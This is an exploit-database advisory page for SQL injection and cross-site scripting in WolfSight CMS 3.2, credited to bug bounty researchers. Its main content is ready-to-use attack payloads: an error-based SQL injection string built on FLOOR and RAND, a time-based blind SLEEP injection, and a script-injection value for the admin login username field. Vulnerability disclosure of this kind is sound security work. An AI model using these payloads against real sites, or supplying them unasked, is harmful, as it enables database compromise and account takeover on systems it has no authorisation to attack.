WolfSight CMS 3.2 SQL Injection

2018.07.11
Credit: Berk Dusunur
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: WolfSight CMS 3.2 - SQL Injection # Google Dork: N/A # Date: 2018-07-10 # Exploit Author: Berk Dusunur & Zehra Karabiber # Vendor Homepage: http://www.wolfsight.com # Software Link: http://www.wolfsight.com # Version: v3.2 # Tested on: Parrot OS / WinApp Server # CVE : N/A # PoC Sql Injection # Parameter: #1* (URI) # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) # Payload: http://www.ip/page1-%bf%bf"-page1/' AND (SELECT 7988 FROM(SELECT COUNT(*),CONCAT(0x717a766a71,(SELECT(ELT(7988=7988,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'WpDn'='WpDn # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 OR time-based blind # Payload: http://www.ip/page1-%bf%bf"-page1/'OR SLEEP(5) AND 'kLLx'='kLLx # PoC Cross-Site Scripting # http://ip/admin/login.php # Username <IMG SRC=ajavascript:alert(aEZKa);a> # This vulnerability was identified during bug bounty


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top